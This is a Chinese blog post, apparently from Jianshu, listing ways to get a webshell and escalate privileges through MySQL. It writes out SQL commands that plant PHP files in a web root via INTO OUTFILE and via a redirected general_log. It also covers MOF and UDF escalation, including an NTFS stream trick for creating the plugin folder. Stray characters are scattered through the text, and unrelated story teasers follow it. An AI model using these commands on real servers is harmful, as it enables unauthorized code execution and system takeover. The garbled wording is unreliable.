mysql的幾種獲取shell和提權(quán)的方式

?喜歡請點個贊吧?
mysql outfile導(dǎo)出webshell

條件:知道物理路徑灸蟆,root權(quán)限萄喳,同時mysql需要有write權(quán)限灾锯,secure_file_priv配置不為null吕朵,查看方法:

show global variables like '%secure_file_priv%';

這個參數(shù)只能通過修改配置文件后重啟mysql修改衅澈。

1.select '<?php phpinfo();?>' into outfile 'C:phpStudy/PHPTutorial/WWW/11.php'

2.新建一個表键菱,創(chuàng)建一個空字段,在這個字段里插入php馬今布,再導(dǎo)出

直接導(dǎo)出需要開啟安全配置

secure_file_priv參數(shù)用于限制LOAD DATA, SELECT …OUTFILE, LOAD_FILE()(讀取文件)

mysql日志獲取webshell

查看:

SHOW?VARIABLES?LIKE?'%general%'

修改狀態(tài):

set global general_log="ON";

修改儲存位置:

set global general_log_file='C:/phpStudy/PHPTutorial/WWW/11.php';

寫馬:

select '<?php phpinfo(); ?>';

只需root權(quán)限即可

mof提權(quán)

MOF提權(quán)的條件要求十分嚴(yán)苛:

windows 03及以下版本

mysql啟動身份具有權(quán)限去讀寫c:/windows/system32/wbem/mof目錄

secure-file-priv參數(shù)不為null

udf提取

需要知道root賬戶的密碼经备,目標(biāo)系統(tǒng)windows

方法1:上傳moon.php等大馬拭抬,進行導(dǎo)出udf,moon.php同樣需要secure_file_priv

方法2: 同樣需要secure_file_priv

將udf文件放到指定位置(Mysql>5.1放在Mysql根目錄的lib\plugin文件夾下)

該文件夾默認(rèn)不存在侵蒙,可以用ntfs ads流來創(chuàng)建

select @@basedir找到mysql目錄

select 'It is dll' into dumpfile 'C:\phpStudy\PHPTutorial\MySQL\lib\plugin::$INDEX_ALLOCATION';生成目錄

從udf文件中引入自定義函數(shù)(user defined function)

執(zhí)行自定義函數(shù)

關(guān)閉安全模式方法

查看配置造虎,執(zhí)行mysql命令

SHOW VARIABLES LIKE "secure_file_priv";

如果value值為null,則為禁止蘑志,如果有文件夾目錄累奈,則只允許改目錄下文件(測試子目錄也不行),如果為空急但,則不限制目錄澎媒;

修改配置可修改mysql配置文件,查看是否有

secure_file_priv =

這樣一行內(nèi)容波桩,如果沒有戒努,則手動添加,

secure_file_priv = /home

表示限制為/home文件夾

secure_file_priv =

表示不限制目錄镐躲,等號一定要有储玫,否則mysql無法啟動

修改完配置文件后,重啟mysql生效

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末萤皂,一起剝皮案震驚了整個濱河市撒穷,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌裆熙,老刑警劉巖端礼,帶你破解...
    沈念sama閱讀 222,729評論 6 517
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異入录,居然都是意外死亡蛤奥,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 95,226評論 3 399
  • 文/潘曉璐 我一進店門僚稿,熙熙樓的掌柜王于貴愁眉苦臉地迎上來凡桥,“玉大人,你說我怎么就攤上這事蚀同∶骞簦” “怎么了?”我有些...
    開封第一講書人閱讀 169,461評論 0 362
  • 文/不壞的土叔 我叫張陵蠢络,是天一觀的道長拷恨。 經(jīng)常有香客問我,道長谢肾,這世上最難降的妖魔是什么腕侄? 我笑而不...
    開封第一講書人閱讀 60,135評論 1 300
  • 正文 為了忘掉前任,我火速辦了婚禮,結(jié)果婚禮上冕杠,老公的妹妹穿的比我還像新娘微姊。我一直安慰自己,他們只是感情好分预,可當(dāng)我...
    茶點故事閱讀 69,130評論 6 398
  • 文/花漫 我一把揭開白布兢交。 她就那樣靜靜地躺著,像睡著了一般笼痹。 火紅的嫁衣襯著肌膚如雪配喳。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 52,736評論 1 312
  • 那天凳干,我揣著相機與錄音晴裹,去河邊找鬼。 笑死救赐,一個胖子當(dāng)著我的面吹牛涧团,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播经磅,決...
    沈念sama閱讀 41,179評論 3 422
  • 文/蒼蘭香墨 我猛地睜開眼泌绣,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了预厌?” 一聲冷哼從身側(cè)響起阿迈,我...
    開封第一講書人閱讀 40,124評論 0 277
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎轧叽,沒想到半個月后仿滔,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 46,657評論 1 320
  • 正文 獨居荒郊野嶺守林人離奇死亡犹芹,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 38,723評論 3 342
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了鞠绰。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片腰埂。...
    茶點故事閱讀 40,872評論 1 353
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖蜈膨,靈堂內(nèi)的尸體忽然破棺而出屿笼,到底是詐尸還是另有隱情,我是刑警寧澤翁巍,帶...
    沈念sama閱讀 36,533評論 5 351
  • 正文 年R本政府宣布驴一,位于F島的核電站,受9級特大地震影響灶壶,放射性物質(zhì)發(fā)生泄漏肝断。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 42,213評論 3 336
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望胸懈。 院中可真熱鬧担扑,春花似錦、人聲如沸趣钱。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,700評論 0 25
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽首有。三九已至燕垃,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間井联,已是汗流浹背卜壕。 一陣腳步聲響...
    開封第一講書人閱讀 33,819評論 1 274
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留低矮,地道東北人印叁。 一個月前我還...
    沈念sama閱讀 49,304評論 3 379
  • 正文 我出身青樓,卻偏偏與公主長得像军掂,于是被迫代替她去往敵國和親轮蜕。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 45,876評論 2 361

推薦閱讀更多精彩內(nèi)容